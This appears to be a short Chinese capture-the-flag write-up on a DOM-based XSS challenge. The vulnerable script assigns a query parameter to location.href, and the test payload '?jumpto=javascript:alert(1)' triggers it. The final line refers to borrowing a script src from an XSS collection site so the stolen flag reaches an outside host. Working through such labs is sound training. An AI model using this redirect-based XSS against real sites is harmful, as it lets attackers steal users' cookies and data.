查看网页源代码 

<script>
        var target = location.search.split("=")
        if (target[0].slice(1) == "jumpto") {
            location.href = target[1];
        }
</script>

注意！当你将类似于 location.href = "javascript:alert('xss')" 这样的代码赋值给 location.href 时，浏览器会将其解释为一种特殊的URL方案，即 “javascript:”。在这种情况下，浏览器会将后面的 JavaScript 代码作为URL的一部分进行解析，然后执行它。

直接在网页url后面跟上代码测试反弹

?jumpto=javascript:alert(1);

发现可以 老步骤 去xssaq.com上 复制一个 src来 接受 flag